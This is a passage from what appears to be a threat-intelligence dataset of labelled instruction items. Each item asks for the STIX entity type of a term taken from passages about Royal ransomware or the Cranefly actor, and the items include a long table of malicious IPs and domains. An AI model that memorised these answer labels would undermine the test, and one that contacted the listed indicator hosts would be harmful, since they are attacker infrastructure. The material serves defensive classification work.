"input": "### Entity:\nciborkumari.xyz\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n163.182.177.80\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRoyal\n\n---\n\n### Text Passage:\n**Initial Access**\nRoyal actors gain initial access to victim networks in several ways including:\n* **Phishing.** According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].\n* According to open source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]\n* **Remote Desktop Protocol (RDP).** The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.\n* **Public-facing applications.** FBI has also observed Royal threat actors gain initial access through exploiting public-facing applications [T1190].\n* **Brokers.** Reports from trusted third-party sources indicate that Royal threat actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nFBI\n\n---\n\n### Text Passage:\n**Initial Access**\nRoyal actors gain initial access to victim networks in several ways including:\n* **Phishing.** According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].\n* According to open source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]\n* **Remote Desktop Protocol (RDP).** The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.\n* **Public-facing applications.** FBI has also observed Royal threat actors gain initial access through exploiting public-facing applications [T1190].\n* **Brokers.** Reports from trusted third-party sources indicate that Royal threat actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nVPN\n\n---\n\n### Text Passage:\n**Initial Access**\nRoyal actors gain initial access to victim networks in several ways including:\n* **Phishing.** According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].\n* According to open source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]\n* **Remote Desktop Protocol (RDP).** The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.\n* **Public-facing applications.** FBI has also observed Royal threat actors gain initial access through exploiting public-facing applications [T1190].\n* **Brokers.** Reports from trusted third-party sources indicate that Royal threat actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nT1190\n\n---\n\n### Text Passage:\n**Initial Access**\nRoyal actors gain initial access to victim networks in several ways including:\n* **Phishing.** According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].\n* According to open source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]\n* **Remote Desktop Protocol (RDP).** The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.\n* **Public-facing applications.** FBI has also observed Royal threat actors gain initial access through exploiting public-facing applications [T1190].\n* **Brokers.** Reports from trusted third-party sources indicate that Royal threat actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.\n",
"output": "ATTACK_PATTERN"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nT1566\n\n---\n\n### Text Passage:\n**Initial Access**\nRoyal actors gain initial access to victim networks in several ways including:\n* **Phishing.** According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].\n* According to open source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]\n* **Remote Desktop Protocol (RDP).** The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.\n* **Public-facing applications.** FBI has also observed Royal threat actors gain initial access through exploiting public-facing applications [T1190].\n* **Brokers.** Reports from trusted third-party sources indicate that Royal threat actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.\n",
"output": "ATTACK_PATTERN"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nT1566.001\n\n---\n\n### Text Passage:\n**Initial Access**\nRoyal actors gain initial access to victim networks in several ways including:\n* **Phishing.** According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].\n* According to open source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]\n* **Remote Desktop Protocol (RDP).** The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.\n* **Public-facing applications.** FBI has also observed Royal threat actors gain initial access through exploiting public-facing applications [T1190].\n* **Brokers.** Reports from trusted third-party sources indicate that Royal threat actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.\n",
"output": "ATTACK_PATTERN"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nT1566.002\n\n---\n\n### Text Passage:\n**Initial Access**\nRoyal actors gain initial access to victim networks in several ways including:\n* **Phishing.** According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].\n* According to open source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]\n* **Remote Desktop Protocol (RDP).** The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.\n* **Public-facing applications.** FBI has also observed Royal threat actors gain initial access through exploiting public-facing applications [T1190].\n* **Brokers.** Reports from trusted third-party sources indicate that Royal threat actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.\n",
"output": "ATTACK_PATTERN"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSymantec\n\n---\n\n### Text Passage:\nAttribution\nHacktool.Regeorg has been used by multiple advanced persistent threat (APT) groups in the past, but as this code is publicly available on GitHub, its use does not offer sufficient clues for attribution. Symantec was unable to link this activity to any known groups.\nThe use of a novel technique and custom tools, as well as the steps taken to hide traces of this activity on victim machines, indicate that Cranefly is a fairly skilled threat actor. While we do not see data being exfiltrated from victim machines, the tools deployed and efforts taken to conceal this activity indicate that the most likely motivation for this group is intelligence gathering.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nCranefly\n\n---\n\n### Text Passage:\nAttribution\nHacktool.Regeorg has been used by multiple advanced persistent threat (APT) groups in the past, but as this code is publicly available on GitHub, its use does not offer sufficient clues for attribution. Symantec was unable to link this activity to any known groups.\nThe use of a novel technique and custom tools, as well as the steps taken to hide traces of this activity on victim machines, indicate that Cranefly is a fairly skilled threat actor. While we do not see data being exfiltrated from victim machines, the tools deployed and efforts taken to conceal this activity indicate that the most likely motivation for this group is intelligence gathering.\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some 